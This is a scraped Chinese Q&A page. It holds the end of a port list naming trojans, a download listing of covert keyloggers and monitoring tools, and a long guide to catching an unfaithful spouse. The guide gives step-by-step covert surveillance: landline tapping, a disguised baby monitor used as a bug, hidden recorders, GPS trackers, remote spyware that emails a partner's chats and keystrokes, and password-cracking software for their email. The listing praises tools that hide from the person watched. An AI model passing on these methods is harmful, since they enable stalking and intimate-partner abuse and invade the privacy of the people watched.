服务:RPC client using a fixed port session replication 说明:应用固定端口会话复制的RPC客户 端口:2583 服务:[NULL] 说明:木马Wincrash 2.0开放此端口。 端口:2801 服务:[NULL] 说明:木马Phineas Phucker开放此端口。 端口:3024、4092 服务:[NULL] 说明:木马WinCrash开放此端口。 端口:3128 服务:squid 说明:这是squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。也会看到搜索其他代理服务器的端口8000、8001、8080、8888。扫描这个端口的另一个原因是用户正在进入聊天室。其他用户也会检验这个端口以确定用户的机器是否支持代理。 端口:3129 服务:[NULL] 说明:木马Master Paradise开放此端口。 端口:3150 服务:[NULL] 说明:木马The Invasor开放此端口。 端口:3210、4321 服务:[NULL] 说明:木马SchoolBus开放此端口 端口:3333 服务:dec-notes 说明:木马Prosiak开放此端口 端口:3389 服务:超级终端 说明:WINDOWS 2000终端开放此端口。 端口:3700 服务:[NULL] 说明:木马Portal of Doom开放此端口 端口:3996、4060 服务:[NULL] 说明:木马RemoteAnything开放此端口 端口:4000 服务:QQ客户端 说明:腾讯QQ客户端开放此端口。 端口:4092 服务:[NULL] 说明:木马WinCrash开放此端口。 端口:4590 服务:[NULL] 说明:木马ICQTrojan开放此端口。 端口:5000、5001、5321、50505 服务:[NULL] 说明:木马blazer5开放5000端口。木马Sockets de Troie开放5000、5001、5321、50505端口。 端口:5400、5401、5402 服务:[NULL] 说明:木马Blade Runner开放此端口。 端口:5550 服务:[NULL] 说明:木马xtcp开放此端口。 端口:5569 服务:[NULL] 说明:木马Robo-Hack开放此端口。 端口:5632 服务:pcAnywere 说明:有时会看到很多这个端口的扫描,这依赖于用户所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能的代理(这里的代理是指agent而不是proxy)。入侵者也会寻找开放这种服务的计算机。,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描包常含端口22的UDP数据包。
2023-07-15 09:16:211

有没有一种可以记录开关机时间、什么时候用了什么程序的软件。(不包括事件查看器)

Geek Superhero V1.2 文件大小:2,558KB 更新时间: 2004-10-23 下载次数:58次 软件星级:★★★ Geek Superhero 可以即时地监测你的电脑,当你的电脑有改变的时候,它会立刻提示你,从而让你作出选择。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 DirSpy V2.8.0.1 文件大小:2,745KB 更新时间: 2004-10-10 下载次数:57次 软件星级:★★★ DirSpy可说是FileSpy的加强版,有别于FileSpy的一次只可以监控一个文件,DirSpy可以监控一个文件夹中下的所有文件。 软件分类:系统监视 操作系统:Windows 95/98/NT/2000 授权方式:试用版 系统监视器(System Spy) V3.4 文件大小:349KB 更新时间: 2004-10-9 下载次数:57次 软件星级:★★★ 程序随系统启动在后台运行,不在任务栏或 Ctrl+Alt+Del窗口中显示,实现深度隐藏并同时监视系统,在任意时刻输入显示窗口的密码(第一次为:hello)便会显示 系统监视器 程序窗口。可以随时察看监视纪录,监视纪录以天为单位。 软件分类:系统监视 操作系统:Windows 95/98/Me 授权方式:试用版 Keyboard Spectator Pro V3.32 文件大小:1,340KB 更新时间: 2004-10-27 下载次数:56次 软件星级:★★★ 如果你是想知道小孩如何使用计算机的家长,或者担心自己的计算机借给朋友时遭到滥用,该怎么办呢?如果不方便在别人的后面盯着看,那就让 Keyboard Spectator 代劳吧。它可以帮你监视计算机上所有按过的计算机按键,并在不让对方发现的情况下悄悄执行纪录的工作。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Family Keylogger V2.80 文件大小:115KB 更新时间: 2004-10-10 下载次数:55次 软件星级:★★★ Family Keylogger 是个计算机监控软件,它能以详细的 Log 文本文件将其它使用者的档案执行纪录条列纪录下来,只要调整模式为隐藏模式即开始纪录,软件的隐藏性佳,能消失于操作系统中的所有选单或安装纪录,让他人无法察觉此软件的存在。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Auto Keylogger V5.2 文件大小:497KB 更新时间: 2004-10-10 下载次数:54次 软件星级:★★★ 通过记录下你键盘的敲击,从而可以监测到你的会话,密码以及网上活动等。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 飞键精灵 V2.0 文件大小:1,470KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★ 飞键精灵 是一个非常酷的软件,它可以将你的鼠标键盘的动作记录下来,并按指定的次数和速度进行重放。还可以为这些动作设置一个快捷键。它的主要应用有①计算机操作教学,把你的操作记录到文件,别人只要有这个文件和软件就可以重复你的操作。 ②记录重复性工作,每次只需软件自动完成。如果这项工作每天重复一次,可以为这项工作设置一个快捷键,每天只需按一下键盘。如果这项工作就是1千次的连续重复,可以设置重复次数,让软件自动快速完成。 ③如果你玩游戏,例如格斗游戏,一个招式必须快速的连按几个键,你可以为这些动作设置一个快捷键。这样,就没人可以打过你了。 ④可以将任何一文件夹、... 软件分类:系统监视 操作系统:Windows 95/98/NT/2000 授权方式:试用版 Windows超级监视 V3.0 文件大小:171KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★ 1.你是否遇到这种情况,当别人用你的电脑时,你希望知道他在你的电脑上作了什么动作,删除了什么文件!2.你是否遇到这种情况,有时一些软件在安装的时候,莫名的往硬盘里写了一些东西!你是不是想知道呢?3.如果不小心忘记了CMOS的密码,应该怎么办?4.如果不小心忘记了屏幕保护的密码,应该怎么办?5.想查看Windows中的******,而又不想动鼠标,应该怎么办?6.想查看Windows的进程?7.想查看CPU的使用情况?8.想查看内存中运行的软件?9.希望通过软件调用常用的工具!10.可以把软件监视的结果保存为文本文档!11.可以设置为软件自启动,而且自启动时隐藏!现在超级监视可以为你解决这个问题... 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 pcLog-电脑日志 V5.30 文件大小:925KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★ 你的同事和家人在你的机器上作了什么?他们是不是使用了你的工作帐号或者玩游戏;你的孩子趁家长不在是不是浏览了一些不应该去的网站;你负责的局域网中的用户是不是没有工作,而是在玩游戏。这些事情你可能都一无所知,pcLog软件能够确切的告诉你:他们已经做的和正在做的一切事情!pcLog能记录输入的汉字和鼠标、键盘(包括小键盘)的动作,还能记录互联网浏览地址,可以定时、定项的记录,并能通过局域网或广域网随时对目标机器查阅历史记录和用户屏幕,或者通过互联网发送历史记录文件,并可以对记录进行保存和管理。还能够对服务端程序进行卸载、更名、停止运行和自动升级等控制,非常适合家长、老板管理自己的机器和网络管理员管... 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 中天卫士 V3.52 单机版 文件大小:12,233KB 更新时间: 2004-10-9 下载次数:50次 软件星级:★★★ 中天卫士是一款功能强大的电脑监控管理软件。与众多监控软件不同,中天卫士不是紧紧监控浏览器或网址,而是监控所有的电脑操作和应用程序,并记录电脑操作和运行情况。中天卫士采用关键字检测技术,无需一个不停更新的庞大的监测库或网址库。中天卫士是电脑和网络安全、健康使用的保证,适用于学校、家庭、企业、机房、网吧、公用电脑等。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Desktop Surveillance Personal V6.0.3 文件大小:2,676KB 更新时间: 2004-10-9 下载次数:49次 软件星级:★★★ 当你不在的时候,总是觉得计算机好象被别人动过。这个软件能够帮上你的忙。当你不在时,它能够监视你计算机的一切活动,包括浏览网页、e-mail、聊天室等等。它会在幕后纪录键盘活动以及撷取屏幕内容,同时它还会作成一份关于所有使用者的详细报告,包括网站、聊天室、新闻群组、游戏、档案,你可以在你回来之后看这份报告或是让他马上把报告从e-mail或是ftp传给你。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 中天卫士 V3.52 工作站版 文件大小:12,401KB 更新时间: 2004-10-9 下载次数:41次 软件星级:★★★ 中天卫士是一款功能强大的电脑监控管理软件。与众多监控软件不同,中天卫士不是紧紧监控浏览器或网址,而是监控所有的电脑操作和应用程序,并记录电脑操作和运行情况。中天卫士采用关键字检测技术,无需一个不停更新的庞大的监测库或网址库。中天卫士是电脑和网络安全、健康使用的保证,适用于学校、家庭、企业、机房、网吧、公用电脑等。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Easy Photo Grabber V1.3 文件大小:1,391KB 更新时间: 2004-10-10 下载次数:41次 软件星级:★★★ Easy Photo Grabber 是一款监控软件。可以对家庭、办公室、商场以及其它任何你需要监视的地方进行监控。能够让你的个人电脑很容易地变成音频监视系统。可调动态监视功能可以让你只捕捉任何你感兴趣的东西。使用其内置的图片浏览器你可以直接浏览、打印,滚动以及缩放图片! 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Activity Logger V2.5 文件大小:1,135KB 更新时间: 2004-10-10 下载次数:41次 软件星级:★★★ 本软件是一款监视软件,当你不在的时候,它可以帮你记录下你的孩子或你的员工,使用电脑的情况,让你对他们的活动了如指掌。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 SPYEX V1.0 1 文件大小:3,054KB 更新时间: 2004-10-10 下载次数:41次 软件星级:★★★ 当你离开你的电脑的时候,SPYEX 可以帮你监视和记录在你电脑上的各种活动,包括: 键盘的敲击记录、应用程序的执行情况、收发的邮件信息以及网络的浏览活动。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 屏幕监督 V3.57 文件大小:10,173KB 更新时间: 2004-10-10 下载次数:39次 软件星级:★★★ 你想了解你的员工在上班时是否上网聊天或打游戏?你的孩子在家是否游览不良网站?你离开电脑时是否有人动过你的电脑?屏幕监督软件来帮您解决这些问题,该软件每隔若干秒将电脑的屏幕拷贝下来,并记录电脑何时运行了什么程序,在您回到电脑旁边时就可以知道您的电脑都做了些什么事情。 软件分类:系统监视 操作系统:Windows 95/98/NT/2000 授权方式:试用版 NetSpy V3.0 Build 2003.04.18 文件大小:2,438KB 更新时间: 2004-10-9 下载次数:39次 软件星级:★★★ 以自动记录通过你的PC机访问过的 Internet站点。它在工作时很隐蔽,你可以知道别人的上网使用纪录,支持以下的浏览器:Netscape Navigator, Microsoft Internet Explorer, AOL ,Prodigy。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Ghost Keylogger V3.80 文件大小:611KB 更新时间: 2004-10-9 下载次数:39次 软件星级:★★★ Ghost Keylogger 可以驻留在后台,悄悄的记录下所有的按键。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式: 了如指掌 V1.1 文件大小:388KB 更新时间: 2004-10-10 下载次数:38次 软件星级:★★★ 当计算机被多个人同时使用的时候,常常苦恼于自己的爱机被人折腾却又无技可施,特别是在有事外出的时候,更是完全不知自己的电脑在哪些时候使用过,使用了多久。 本程序即是专为此功能要求而开发。 程序由两部分组成,一个监视端 SystemPlice.exe 和一个“日志查看器”。您只需要把监视端复制到任意目录下运行一次(... 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 SnapKey: Parental Internet Monitor V2.0 文件大小:655KB 更新时间: 2004-10-10 下载次数:37次 软件星级:★★★ 本软件是一个很好的,父母了解孩子上网情况的软件,它在后台运行,不易被发觉,记录下计算机的所有运行情况。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Winvestigator V2.5 文件大小:796KB 更新时间: 2004-10-9 下载次数:37次 软件星级:★★★ Winvestigator可以监视你电脑的使用情况,为你纪录下你电脑所连结过的网站、所输入过的字串、以及所有使用过的程序。它是以隐藏的方式在开机时执行,并且随即将自己隐藏起来,就算对方稍具有电脑知识也无法发现Winvestigator程序的存在。Winvestigator会将所有使用纪录文件以加密的方式储存,就算对方在硬盘中找到纪录文件,他也无法得知你就算记录了些什么东西。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 NETObserve V2.98 文件大小:1,075KB 更新时间: 2004-10-10 下载次数:36次 软件星级:★★★ ExploreAnywhere的NetObserve有许多有用的监视和系统管理功能。该程序可以按照不同窗口记录键盘内容;可以记录所访问的URL、聊天会话以及其他活动;可以记录打印机使用情况;可以拍摄屏幕快照(而且这种快照不仅仅只包含当前活动的窗口信息);可以读取、移动和删除用户的文件和目录;甚至还可以监视连接到系统的Web摄像机。此外,NetObserve还有一个简单的Web过滤器,能够阻塞特定的网站并记录试图访问这些网站的请求。不过,NetObserve也有几个令人沮丧的缺点。结论: 无论用于何种目的,使用NetObserve都是很危险的。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Visual Log V2.02 文件大小:138KB 更新时间: 2004-10-10 下载次数:34次 软件星级:★★★ 这个程序的基本功能是事件纪录,可以纪录用户所运行的所有程序,以及在这些程序中的键盘和鼠标动作,并且可以把这些结果发送到网络中的另一台机器上记录,并且在图形界面中进行回放和查看,所以正如它的名字 -- visual log 主要支持以下一些特性: 配置简单易于使用支持通过网络 多计算机监控可以在任务管理器中隐藏 ,并且无法杀掉提供密码保护功能 agent程序占用资源极小 内置日志分析和查看程序允许隐/显任务栏小图标支持windows nt/2000/xp/2003 软件分类:系统监视 操作系统:Windows NT/2000/XP/2003 授权方式:试用版 Groone"s Macroer V2.6.6 文件大小:4,130KB 更新时间: 2004-10-9 下载次数:33次 软件星级:★★★ 宏记录工具,能帮你完成自动重复的工作,而无需使用脚本语言编制,用这个软件来记录你的操作,然后存储,即可重复播放。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 KillWindow窗口终结者 V3.0 文件大小:6,388KB 更新时间: 2004-10-9 下载次数:32次 软件星级:★★★ KillWindow窗口终结者以一个小窗口为单位监视目前计算机正在运行的所有程序(或打开的窗口),根据你的设置禁止某个程序的运行(或某个窗口显示),将本软件安装到你的机子里面,可以有效地防止你的个人隐私不被泄露,防止别人在你的计算机上运行你不想让别人运行的软件。 软件分类:系统监视 操作系统:Windows 98/Me/2000/XP 授权方式:试用版 Faber Toys V2.6 Build 52 文件大小:1,905KB 更新时间: 2004-10-10 下载次数:31次 软件星级:★★★ Faber Toys是为高级电脑用户开发的工具。可以用这个工具看出电脑中正在运行什么程序、并提供详细的列表。对程序员也非常有用,可用这个工具跟踪你开发的软件。该工具运用了FPL(Fast Property Load)技术来保证在大多数机器上能够稳定地运行。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Keyboard Guardian V1.02.0056 文件大小:1,567KB 更新时间: 2004-10-9 下载次数:31次 软件星级:★★★ Keyboard Guardian可以监视你的键盘和鼠标的动作,同时产生一个记录文件! 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Key Thief V2.0 文件大小:2,342KB 更新时间: 2004-10-9 下载次数:31次 软件星级:★★★ 能够记录从系统启动到关机所有的键盘按键,还可以保存整个屏幕后台运行,不会在任务列表里显示。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 KeyKey 2000 V1.25 文件大小:132KB 更新时间: 2004-10-9 下载次数:30次 软件星级:★★★ 能够记录从系统启动到关机所有的键盘按键。记录所有曾经被按过的按键,以及被开启的视窗的标题,甚至连开机和关机时间也都通通会被KeyKey记录下来。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 神鹰监控 V1.0 文件大小:1,741KB 更新时间: 2004-10-9 下载次数:30次 软件星级:★★★ 用于家长、公司管理者,使其不在场时可以了解和控制对本电脑的使用,并作出记录。例如可以设定:1、在本机不能用QQ上网聊天,不能玩某个游戏,发现的话可以立即/x分钟后关闭或者使其某一个按钮失效或消失,并作出记录。2、在本机指定某一个QQ号不能用,其它的号均可用。3、过滤不应使用的网站,如色情、游戏网站等。本软件的设置程序和执行程序分离,设置后生成一个执行程序,设置数据已经打包进入执行程序,执行程序只有一个.exe文件,有几十KB,开机自启动,不在任务栏显示,按启动热键任务列表不显示。主文件名可任意更改,报告文件名可任意设置,故隐蔽性极强。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 下载地址:http://download.it168.com/down2.asp?b_id=08&s_id=0808&letter=&csort=hits&page=1&cname=
2023-07-15 09:17:234

如何揪住出轨的伴侣

目录方法1:在电话上捉奸1、让你的手指完成任务吧。2、如果你家里是老式的有线电话,那用电话监听就很容易。3、现在按下录音键。4、使用婴儿监视器。5、用数码录音机记录。6、抛弃所有信任,监视你的配偶的一切个人通信。方法2:用其他方法监视配偶1、用任何你可以使用的工具。2、装一个GPS设备。3、计算里程。4、特别注意你的配偶的朋友。5、研究历史记录。6、注意行为的变化。7、寻找秘密。方法3:处置你的配偶1、去抓个现行!如果你确信你的配偶在背叛你,在你监听了电话、检查有邮件、旅游细节之后,你所有的是一种本能的感觉,那你要决定你还愿意花多长时间来确认你的配偶是否对你忠诚。2、作一些假设。3、为计划充分准备。4、离开。5、监视你的配偶的GPS活动情况,如果你的配偶在奇怪的时间离开家,那就跟着它,远远在监视着。6、必要的时候再做一次。7、如果你发现了什么,那你可以带着证据回来了。方法4:发现之后1、不管用什么方式,都要去处理发现的事情。2、如果你确实找到正确的、具体的证据证明你的配偶出轨了,那你现在肯定感到非常悲惨、非常伤心。3、如果你没有找到配偶不忠诚的证据,那你现在没有什么理由再去怀疑对方的出轨了。你已经注意到了一些迹象,你的思维正把一些片断联系到一起。你的配偶经常晚回家,或者以工作为借口花很多时间在外面。你的配偶回家以后,和你吃晚饭时一言不发,然后泡在网络上,用各种古怪的理由回避你的问题??如果你担心亲爱的他(她)正在谋划一些事情,而你想找到真相,以下有一些可以帮你证实怀疑的途径。方法1:在电话上捉奸1、让你的手指完成任务吧。电话在每个人的生活中都很常见,而且随着时代的推进越来越普及。所以他们的“风流韵事”肯定会用到电话——你可以想象得到,对吧?2、如果你家里是老式的有线电话,那用电话监听就很容易。在一个他/她不经常去的房间角落放一个备用电话,插上电话线。提前把送话器卸掉,这样你低低的呼吸声就不会把你出卖掉。当你听到他/她大喊说,“我来接,亲爱的。”(你知道一定是她/他打来的),你可以到你的“作战室”,谨慎地拿起话筒,不要犹犹豫豫的:扭动话筒下的挂断按钮会在电话里出现喀喀的声音,可能导致你被发现。3、现在按下录音键。如果你确定即将变为前任的配偶在有你在场的情况下不会给他/她的小甜心打电话,但是当他/她觉得你没看见的时候,不可避免地会鬼鬼祟祟地打电话——或者他/她内心汹涌的亲热欲望让他/她必须在睡前听到情人的声音,那么录下他们的对话会非常管用的。如果你提前计划好,你可以在他/她内心涌起欲望的时候假装打开电视看。如果你有一个智能电话或者功能电话,你可以把耳机的听筒放在话筒的旁边,把他们卿卿我我的话都录下来。如果他们的把戏被揭穿了,你得到了你想要的,那就不用等了。把他/她的洗漱用品打包到旅行包里面,不给吃的东西,赶他/她出去。但是如果结果只是他/她的保龄球伙伴打来电话确认这星期四在第六道打球的事情,那你就要准备他/她最爱的点心,微笑着呈上去了。4、使用婴儿监视器。这是一种廉价而技术含量低的监听方法。当然,如果家里现在没有小婴儿,事情就有点棘手,但是你可以办得到。等到他/她出去购物的一天,你去当地的小发明超市,买一个简单的婴儿监视器、一罐喷漆,把你打算装监视器的地方粉刷一下,或者买一卷墙纸(防止监视器上有闪光灯)。用喷漆把监视器漆一遍。涂之前把麦克风盖起来,省得你白忙活一场,也防止你涂过头。你不想把整个房间都搞得味道很重吧。去你觉得她可能和她的奸夫呢喃私语的房间,把监视器放在她不太可能看到的隐秘位置,在书架后面,或者沙发后面,如果你运气实在不好,那就放在卧室或者浴室里面的某处。把它充好电,把无线电发射器放在房间里,把声音调整到耳语的程度。你回到自己常呆的地方,打开接收器。你能听得清楚吗?如果能,那就准备开始吧。如果听不到,做一些调整,直到你可以清楚地听到信号为止。当电话响起的时候,她会说“我来接,是工作的事。”你就说“好的,亲爱的,我去书房上网查查??”(你可以说任何话;等到她再说“好的,我会??”的时候,她的肾上腺素已经疯狂分泌了。)到你自己的房间,打开监视器,记录下来(用手机、磁带,不管你手头有什么),听听接下来会发生什么。万一听到了你正担心的事情,给她叫一辆出租车,把这个容易受诱惑的人送到乡下不准回来。当然,如果你听到她说,“好的,明天我会交报告的,老板,我会??等等,这是什么??窃听器?!”那你就为自己叫一辆出租车吧,你的麻烦来了。5、用数码录音机记录。有很多种数码录音机,像录音笔、拇指存储器,甚至像手机一样的声控录音器。这意味着,不管你的配偶去哪里和情人甜蜜,你都可以装一个录音机,当他们开始的时候,电子监视器就自动开始工作,像陷阱一样。在你方便的时候检查一下这个陷阱,祝你好运!6、抛弃所有信任,监视你的配偶的一切个人通信。直接看你的配偶的手机可以发现很多线索——特别是短信和微博。她的亲密的朋友可能会相当坦白地说出他们的所想和建议。你可以从一个人的发件箱中找到比收件箱中更多的信息。定期去检查可以让你知道正在发生什么事情。注意对方可能用了假名字,但如果在一个不恰当的时间收到短信,假名字也没法掩盖什么。检查邮件。他和情妇相互传情的另外一种方法就是发邮件或者在线聊天。如果你的配偶的每一个邮件或者聊天记录都是准备好可以给你看的,那怎么办呢?一种叫做远程监视人软件可以记录他/她所有发过的邮件、聊天内容、实时信息、浏览过的网页、键入的内容,然后自动地把这些记录发送到你的邮箱中。除非你的配偶非常小心,不然你可以等他或她不在的时候,突击去检查他/她的电脑,看看最近的应用程序,找找其他可以发现他们勾引异性的证据。可能会找到下次浪漫约会的邮件,或者一些热辣的聊天内容。不太聪明的出轨者会很快用密码防止你偷看邮件,或者把邮件藏在不同的文件夹中。如果是这样,你开始可以尝试他常用的密码,如果还是不行,可以在网上找一些破解密码的软件。方法2:用其他方法监视配偶1、用任何你可以使用的工具。你可以用一些无生命的东西帮你——它们永远不会说话!例如,用一些外形上绝对看不出来的隐形摄像机!它们很隐秘,甚至你自己都看不出来里面藏了一个摄像机。隐形摄像机有挂钟,有盆栽,还有台灯等。2、装一个GPS设备。用GPS定位仪追踪一下你那任性的妻子最近去过的地方。它会显示出来她从哪里开始上车,呆了多久。下次她说“亲爱的,我在工作。”你可以回她“哦,那第9旅馆一定很欢迎你!”3、计算里程。一个替代GPS的便宜(甚至免费)的简单方法是计算上班前后的里程。是否和你的配偶上班到回家的路程相匹配?汽车里程表上的数字出现差异,意味着出现了一些问题,能帮你发现有没有什么事情发生。4、特别注意你的配偶的朋友。谁与你的配偶的见面次数最多?谁与你的配偶联系得最频繁?他们也是你的好朋友吗?当你见到他们的时候,和他们聊天的时候要特别警惕不好的感觉。不要直接向他们发问,不要逼迫他们选择支持谁。他们不愿意说的话和他们说出来的话至少是同等有用的。5、研究历史记录。如果电话记录被锁住了,可以在网上通过电话账号查询细节。你会需要一个密码才能进入,但是可能密码是在事情发生很久以前就设置好了的,你可能还记得,不然就要猜了。看看使用的频率和打电话的时间,是不是这两样都在增长,没怎么变化还是变多了?了解这些可以让你洞悉事情进展得如何了。6、注意行为的变化。感兴趣的衣物、外表、体重增减、冷淡、距离感、敌意的变化;不愿意讨论以后的事情,和你分开,不想做爱,还有明显的每天的情感变化。看看这些变化是渐渐增加的还是减少的?变化就是线索。7、寻找秘密。留心观察你的配偶为了躲过侦探的隐藏的电话,同样,查查他/她电脑中的回收站——人们常常把东西删除了,却忘了清空回收站。方法3:处置你的配偶1、去抓个现行!如果你确信你的配偶在背叛你,在你监听了电话、检查有邮件、旅游细节之后,你所有的是一种本能的感觉,那你要决定你还愿意花多长时间来确认你的配偶是否对你忠诚。诚实地问问自己为什么不相信配偶了。你有什么理由吗,真实的还是想象出来的,觉得你的配偶是现在不忠诚,还是早就不忠诚了?不一定要有法律上站得住脚的证据,但是除了你的感觉或者预感之外,你是否还有其他证据?夫妻之间很容易仅仅依据一些捕风捉影的事,就让自己确信配偶对自己的不忠诚,结果最后证明只是个人的臆想、猜测和不安全感在作祟,这并不少见。如果他只是看起来对你没什么兴趣,并不代表着他出轨了。可能真的是工作到很晚或者跟朋友出去应酬了。在一起不久的夫妻很容易忘记他们怎么会相爱,因为每一天都在拌嘴,而长久的夫妻就会习惯了,理所当然在和对方在一起,这种情况也并不新鲜。而且,有时候领导是工作狂,你的配偶不得不“嫁给工作或者嫁给老板”,那就很难花时间陪你了。2、作一些假设。如果你觉得你有确实的理由去怀疑你的配偶,那假设她一定会采取一些措施让她的出轨不被发现。她可能不会用家里的电脑发邮件,或者不用家里的电话。她可能不会借口工作很晚而去旅馆约会,防止你打她电话没有人接或者被别人看到早早地离开单位。她会表现得很正常,一切就像你熟悉的一样,恰恰用这些时间去出轨。做爱一次不需要花太多时间或承诺。他们两个在公园碰面,坐上车,去他们的第九旅馆呆半个小时,还来得及回来去超市。她甚至回来的时候会带着买回来的东西,一切正常。如果你真的决心找出事实,你要做的是:3、为计划充分准备。准备一个有变焦镜头的摄像机,放一个GPS追踪器在你的配偶身上(衣服或包里,等等)或者车里。在你的床后面装一个声控的录音器。然后,你自己去郊外旅行2到4天,告诉你配偶这个消息。做好功课,告诉你的配偶你去旅行的细节,让你看起来确实像要离开一段时间,实际了你只秘密计划在城外的旅馆呆几天。(如果你的配偶想知道你旅行的细节,那就做一些预订,让你配偶确信,但是至少提前一个小时偷偷取消预订,然后呆在离家不远的地方。)4、离开。尽量在机场和到达目的地的时候给你的配偶打个电话。用你自己的手机打,那你就可以说你在任何地方。跟她说会工作到很晚,抱歉地说晚上不能打电话了。5、监视你的配偶的GPS活动情况,如果你的配偶在奇怪的时间离开家,那就跟着它,远远在监视着。跟踪你的配偶(雇一个人也可以),但是如果你有暴力倾向或者容易冲动,要三思。如果你的配偶只是回到家里了,那你把车停在公园里静观其变。6、必要的时候再做一次。如果合适的放可以使用摄像机,检查一下记录防止你错过什么。如果你需要更多的时间,在原定返回的那天的早上打个电话,说明要再多呆一天,并且表达出歉意。7、如果你发现了什么,那你可以带着证据回来了。如果没有,不要继续呆在外面。总之,不要拖延——你得用你的证据和配偶对峙,或者承认是自己瞎想了,从而让你们的关系可以有所进展,或者和好,或者必要的话就分开。方法4:发现之后1、不管用什么方式,都要去处理发现的事情。发现配偶对你的不忠诚并不是件开心的事,实际上,它可能是很残忍的,因为你基于这桩婚姻的生活就此崩溃了。而且,你可能对于自己不得不鬼鬼祟祟去找事实的作法觉得汗颜。总而言之,发现的过程是令人痛心的,结果可能使你很心寒。2、如果你确实找到正确的、具体的证据证明你的配偶出轨了,那你现在肯定感到非常悲惨、非常伤心。但是实际上知道总比不知道好。以后你会明白,虽然这是一个惨痛的经历,但是值得拥有你的人绝不是现在的这个。从朋友、家人或者你的医生、咨询师那里寻找支持,帮你度过现在这个难过的时刻。决定是否离开你的配偶是一个谨慎的事,只有你自己有权决定,但别人的支持能让你的内心更强大。读一读《如果在婚变后维持一段婚姻》也许对你会有帮助。3、如果你没有找到配偶不忠诚的证据,那你现在没有什么理由再去怀疑对方的出轨了。或者,如果你还是觉得你的配偶超级小心,鬼鬼祟祟,你现在至少知道在不远的将来如何去抓住他的不忠。然而,如果你很确信你的持续怀疑是对的,到了这个阶段,很可能你们之间曾经的信任感已经荡然无存了。小提示大量的短信费用或者他/她反常地发短信可能意味着有什么事情发生了。可以拿他们的不忠开玩笑来试探他们的反应。当你的配偶买了一个新手机时要谨慎。如果没办法解释或者偷偷地在用(被你偶然发现),就要更加小心,其他可疑的迹象包括突然在手机或电脑设置密码,或者把手机设置成一直静音。你的配偶是不是突然规律或不规律地因为工作晚归,或者更频繁地因为工作外出?这可能意味着有什么事情。如果你问配偶一些关于行踪的任何问题,他/她会想方设法回避问题,那你的配偶可能在掩饰什么。用你的感官去感觉。当你觉得你的配偶刚约完会回来,你可以更靠近他一些。用你的鼻子去闻,有新的气味可能是使用了许久未用的新香水或者须后水,或者换了香水。永远不要忽略你的直觉——至少做点什么来减轻你的担心。任何外观的突然改变(减肥、新发型、新衣服等等)都可能是需要考虑进来的迹象。不过要记得每个人生活中都会有小危机,人们企图用自我改善来弥补;而这种行为本身可能并没有什么意义。如果你感觉到你触及了配偶的防卫区,使他们变得紧张了,不要放弃。让这个令人不安的谈话继续下去,你的配偶可能会崩溃——或者如果是你错了,那就硬着头皮去看电视吧。买一套精子试纸去测试内衣。要明白如果这样做,那你就真正毁掉你们之间的信任了,因为这是一个侵犯隐私的行为。连续几天查查车子里面的东西,找找不寻常的东西。从快餐店的咖啡杯到一个用过的避孕套,找到任何可能被发现的东西。警告你发现的结果可能不是你想看到的,你觉得你需要知道的也可能是你不希望知道的。记住,你使用的监视方式可能不会、也可能会侵犯他人的隐私。确认一下当地的法律条文,再合法地使用这些产品——很多时候,这些东西的使用是不合法的:在他/她不知道的情况下进行监视可能是违法的。在没有得到许可的情况下探查别人的电脑可能是违法的。黑客软件的使用可能是违法的,你可以选择像Micro keylogger之类的著名监控软件。如果你的怀疑只是偏执的妄想,没有事实基础,而你的配偶发现了你这些隐密的行为,那你可能就对你的婚姻造成了严重的(甚至是不可弥补的)伤害。即使没有变成这样,去看一下心理医生对你也是有好处的。
2023-07-15 09:17:411

电脑上常见的几种木马?

